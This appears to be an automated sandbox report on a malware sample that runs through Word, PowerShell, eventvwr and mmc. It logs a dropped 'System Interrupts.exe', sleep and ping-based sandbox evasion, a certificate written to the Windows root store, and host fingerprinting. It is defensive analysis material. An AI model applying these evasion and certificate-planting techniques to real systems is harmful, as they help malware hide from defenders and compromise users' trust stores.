Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\luketaylor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\luketaylor\AppData\Roaming\Microsoft

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Show sources

Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 7281
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 6945

Found dropped PE file which has not been started or loaded

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Dropped PE file which has not been started: C:\Users\luketaylor\AppData\Local\Temp\System Interrupts.exe

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3252	Thread sleep time: -922337203685477s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -922337203685477s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3392	Thread sleep count: 7281 > 30
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -20000s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -250s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -172s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -156s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -156s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -78s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -78s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -2000s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -250s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3480	Thread sleep count: 190 > 30
Source: C:\Windows\System32\mmc.exe TID: 3480	Thread sleep time: -95000s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -1641s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -688s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -1640s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -7266s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -359s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -359s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -8891s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3392	Thread sleep count: 6945 > 30
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -8891s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -735s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -344s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -9640s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -9640s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -360s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -360s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -17750s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -17750s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -1500s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -1125s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -1125s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -19250s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -9625s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3420	Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -9609s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -391s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -391s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -8844s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -8844s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -734s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -406s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -406s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -9594s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -9594s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -390s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -390s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -8860s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3464	Thread sleep time: -8860s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3480	Thread sleep time: -500s >= -60s
Source: C:\Windows\System32\mmc.exe TID: 3420	Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\PING.EXE TID: 3432	Thread sleep time: -14000s >= -60s

Uses ping.exe to sleep

Show sources

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE PING -n 15 127.0.0.1

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\eventvwr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX

Stores large binary data to the registry

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Queries the installation date of Windows

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion

Queries the installation date of Windows

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35\MMCEx.dll VolumeInformation
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35\MMCEx.dll VolumeInformation
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35\MMCFxCommon.dll VolumeInformation
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35\MMCFxCommon.dll VolumeInformation
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35\Microsoft.ManagementConsole.dll VolumeInformation
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35\Microsoft.ManagementConsole.dll VolumeInformation
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\EventViewer\6.1.0.0__31bf3856ad364e35\EventViewer.dll VolumeInformation
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\EventViewer\6.1.0.0__31bf3856ad364e35\EventViewer.dll VolumeInformation
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\MiguiControls\1.0.0.0__31bf3856ad364e35\MIGUIControls.dll VolumeInformation
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\MiguiControls\1.0.0.0__31bf3856ad364e35\MIGUIControls.dll VolumeInformation

Behavior Graph

Legend:

Process
Signature
Created File
DNS/IP Info

Yara Overview

No Yara matches

Screenshot

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Error!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

Privilege Escalation:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Software Vulnerabilities:

Networking:

Persistence and Installation Behavior:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Behavior Graph

Yara Overview

Screenshot